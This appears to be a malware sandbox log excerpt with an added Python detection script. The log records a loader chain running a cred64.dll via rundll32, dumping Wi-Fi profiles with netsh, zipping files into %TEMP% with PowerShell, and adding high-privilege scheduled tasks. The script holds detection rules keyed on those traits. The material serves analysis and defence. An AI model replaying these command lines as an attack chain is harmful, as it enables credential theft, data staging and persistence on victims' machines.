Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1636,i,5624198576768077496,445941079671464976,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\netsh.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1984,i,457568203381776828,11237095852378400144,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe "C:\Users\user\AppData\Local\Temp\1000187001\build12.exe"
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe
Source: C:\Windows\System32\rundll32.exe Process created: unknown unknown
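The process chain recorded above has a recognisable shape: a loader under %TEMP% starts payloads under %TEMP%, hands a DLL in AppData\Roaming to rundll32 (32-bit rundll32 then re-executes the native one for the 64-bit credential DLL), the DLL runs netsh wlan show profiles and a PowerShell Compress-Archive into %TEMP%, and a sibling payload registers hourly and at-logon scheduled tasks with /rl HIGHEST pointing into ProgramData. The script below is an added example, not part of this report or of any sandbox product: it replays process-creation events copied from the lines above (plus two constructed benign events) through a few rules that key on exactly those traits. The parent/image/cmdline fields are an assumed schema for the example; map Sysmon Event ID 1 or your EDR's fields onto them.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (assumed schema for this example, not a real log format)."""
    parent: str   # image path of the creating process ("unknown" when not recorded)
    image: str    # image path of the created process
    cmdline: str  # command line as recorded


TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.I)


def is_image(path, name):
    """True when the path's file name is `name`, case-insensitively."""
    return path.lower().endswith("\\" + name)


def rundll32_user_dll(ev):
    """rundll32 invoked on a DLL under AppData with an explicit export
    (the cred64.dll / clip64.dll, Main pattern in the chain above)."""
    return is_image(ev.image, "rundll32.exe") and re.search(
        r'\\appdata\\(roaming|local)\\[^\s"]+\.dll\s*,\s*\w+', ev.cmdline, re.I) is not None


def wow64_rundll32_relaunch(ev):
    """32-bit rundll32 (SysWOW64) re-executing the native rundll32 (System32):
    the hand-off a 32-bit loader needs to get a 64-bit DLL loaded."""
    return (is_image(ev.parent, "rundll32.exe") and "\\syswow64\\" in ev.parent.lower()
            and is_image(ev.image, "rundll32.exe") and "\\system32\\" in ev.image.lower())


def wifi_profile_dump(ev):
    """netsh wlan show profile(s): enumerates saved Wi-Fi profiles, the first step of
    recovering their keys; rarely run by anything but an interactive admin."""
    return is_image(ev.image, "netsh.exe") and re.search(
        r"wlan\s+show\s+profiles?", ev.cmdline, re.I) is not None


def archive_staging(ev):
    """PowerShell Compress-Archive writing its zip under %TEMP%: collected data staged
    for exfiltration rather than a user archiving documents."""
    return (is_image(ev.image, "powershell.exe") and "compress-archive" in ev.cmdline.lower()
            and re.search(r"-destinationpath\s+'?[^']*\\appdata\\local\\temp\\",
                          ev.cmdline, re.I) is not None)


def schtasks_userwritable_highest(ev):
    """schtasks /create whose action lives in ProgramData or AppData and asks for /rl HIGHEST."""
    c = ev.cmdline.lower()
    return (is_image(ev.image, "schtasks.exe") and "/create" in c and "/rl highest" in c
            and re.search(r'/tr\s+"?[^"]*\\(programdata|appdata)\\', ev.cmdline, re.I) is not None)


def temp_to_temp_spawn(ev):
    """An executable under %TEMP% launching another executable under %TEMP% (loader dropping payloads)."""
    return (TEMP_DIR.search(ev.parent) is not None and TEMP_DIR.search(ev.image) is not None
            and ev.image.lower().endswith(".exe"))


RULES = {f.__name__: f for f in (rundll32_user_dll, wow64_rundll32_relaunch, wifi_profile_dump,
                                 archive_staging, schtasks_userwritable_highest, temp_to_temp_spawn)}


def detect(events):
    """Return (rule_name, event) for every rule that fires on every event."""
    return [(name, ev) for ev in events for name, rule in RULES.items() if rule(ev)]


def summarize(events):
    """Hit count per rule, with zeros for rules that stayed quiet."""
    counts = {name: 0 for name in RULES}
    for name, _ in detect(events):
        counts[name] += 1
    return counts


T = r"C:\Users\user\AppData\Local\Temp"
R32, R64 = r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\System32\rundll32.exe"
# Events copied from the process-creation lines of the report above.
SAMPLE_EVENTS = [
    ProcEvent(T + r"\09fd851a4f\explorha.exe", R32, '"' + R64 + r'" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main'),
    ProcEvent(R32, R64, '"' + R64 + r'" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main'),
    ProcEvent(R64, r"C:\Windows\System32\netsh.exe", "netsh wlan show profiles"),
    ProcEvent(R64, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal"),
    ProcEvent(T + r"\09fd851a4f\explorha.exe", R32, '"' + R64 + r'" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main'),
    ProcEvent(T + r"\09fd851a4f\explorha.exe", T + r"\1000054001\amert.exe", '"' + T + r'\1000054001\amert.exe"'),
    ProcEvent(T + r"\1000056001\c884f8452a.exe", r"C:\Windows\SysWOW64\schtasks.exe",
              r'schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST'),
]
# Constructed benign events (not from the report) showing the rules stay quiet on ordinary activity.
BENIGN_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", R64, '"' + R64 + '" shell32.dll,Control_RunDLL'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\netsh.exe", "netsh interface show interface"),
]

if __name__ == "__main__":
    for name, ev in detect(SAMPLE_EVENTS + BENIGN_EVENTS):
        print(f"{name:30} {ev.image} :: {ev.cmdline}")
```

Each rule is deliberately narrow enough to run on its own, but the chain is what makes the call: rundll32 on an AppData DLL followed within seconds by netsh wlan show profiles and a Compress-Archive into %TEMP% from the same rundll32 is the Wi-Fi and file-grab behaviour the Sigma hits above describe, and correlating on the parent process id rather than alerting per rule keeps the noise down.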
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
